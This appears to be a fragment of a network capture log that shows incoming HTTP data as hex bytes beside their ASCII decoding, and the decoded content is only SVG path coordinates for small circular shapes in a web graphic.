                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2098INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2114INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2130INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                                        Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2146INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2162INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2178INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                                                        Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2194INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2210INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2226INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2242INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                                                        Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2258INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                                                        Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2274INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2290INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2306INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                                                        Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2322INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2338INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2354INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
